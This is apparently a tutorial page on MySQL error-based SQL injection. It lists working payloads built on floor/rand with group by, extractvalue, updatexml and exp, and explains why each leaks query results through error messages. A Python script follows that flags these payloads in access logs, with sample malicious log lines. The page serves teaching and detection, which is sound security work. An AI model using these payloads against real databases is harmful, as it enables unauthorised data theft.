floor function
select count(*),(floor(rand(0)*2))x from table group by x;
select: the query statement
group by: groups rows by the given column
rand(): generates a random number from 0 to 1
floor(): returns an integer
count(): aggregates the data (similar to deduplication)
Reason: when executing the statement, MySQL creates a virtual table with two fields (the group value and the count value). When the group value being inserted already exists in that table, an error is raised.
Reference: http://www.cnblogs.com/sfriend/p/11365999.html
extractvalue function
Length is limited to 32 characters
and extractvalue(1,concat(0x7e,(select user()),0x7e));
This function accepts two string parameters: an XML markup fragment and an XPath expression. The second parameter must be a string in XPath format; ours is not, so an error is reported.
Reference: https://www.cnblogs.com/xishaonian/p/6250444.html
updatexml function
Length is limited to 32 characters
and updatexml(1,concat(0x7e,(select user()),0x7e),1)
In updatexml(1,2,3), the first parameter is a string giving the name of the XML document object, the second is a string in XPath format, and the third is a string that replaces the matching data that was found. An error is reported because the second parameter does not follow the XPath rules.
Reference: http://blog.csdn.net/qq_37873738/article/details/88042610
name_const function
Only the version information of the database can be obtained
exp function
exp(~(select * from(select user())a))
exp(x) returns e raised to the power of x. When the value exceeds the range MySQL can represent, an error is raised. The payload above works as follows: it first queries user() and names the result a, then select * from a returns the whole result set a.
Error-reporting functions:
floor()
extractvalue()
updatexml()
name_const()
join()
exp()
geometrycollection()
polygon()
multipoint()
multilinestring()
multipolygon()
linestring()
Reference: http://www.mamicode.com/info-detail-2366760.html
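
Detection side, as an added example (not code from the referenced posts): the script below normalizes request query strings and flags the error-based function patterns listed on this page. The signature names, the minimal log layout and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# Hypothetical signature names; patterns cover the functions this page lists.
SIGNATURES = {
    "floor_rand_group": re.compile(r"floor\s*\(\s*rand\s*\(.*?group\s+by", re.I | re.S),
    "extractvalue": re.compile(r"\bextractvalue\s*\(", re.I),
    "updatexml": re.compile(r"\bupdatexml\s*\(", re.I),
    "name_const": re.compile(r"\bname_const\s*\(", re.I),
    "exp_overflow": re.compile(r"\bexp\s*\(\s*~", re.I),
    "geometry_subquery": re.compile(
        r"\b(?:geometrycollection|multipolygon|multilinestring|multipoint"
        r"|polygon|linestring)\s*\(\s*\(?\s*select\b", re.I),
}
# Assumed minimal access-log layout: client "METHOD target HTTP/x" status
LOG = re.compile(r'^(\S+) "(?:GET|POST) (\S+) HTTP/[\d.]+" (\d{3})$')

def normalize(raw):
    """URL-decode twice (catches double encoding) and blank out /* */ comments."""
    for _ in range(2):
        raw = unquote_plus(raw)
    return re.sub(r"/\*.*?\*/", " ", raw, flags=re.S)

def detect(query):
    """Return the sorted signature names that match a raw query string."""
    text = normalize(query)
    return sorted(name for name, rx in SIGNATURES.items() if rx.search(text))

def scan(lines):
    """Return (line_no, client, status, matches) for each flagged log line."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = LOG.match(line)
        found = detect(m.group(2).partition("?")[2]) if m else []
        if found:
            hits.append((n, m.group(1), int(m.group(3)), found))
    return hits

SAMPLE_LOG = [  # constructed lines; addresses are from documentation ranges
    '198.51.100.7 "GET /news?id=1+and+updatexml(1,concat(0x7e,(select+user()),0x7e),1) HTTP/1.1" 500',
    '198.51.100.7 "GET /news?id=1%2520and%2520exp(~(select%2520*%2520from(select%2520user())a)) HTTP/1.1" 500',
    '192.0.2.10 "GET /search?q=floor+plan+updates&page=2 HTTP/1.1" 200',
    '198.51.100.7 "GET /news?id=1+and+extractvalue/**/(1,concat(0x7e,(select+user()),0x7e)) HTTP/1.1" 200',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

Signature matching is a detection aid only. Parameterized queries and keeping database error text out of HTTP responses remove the channel these functions depend on.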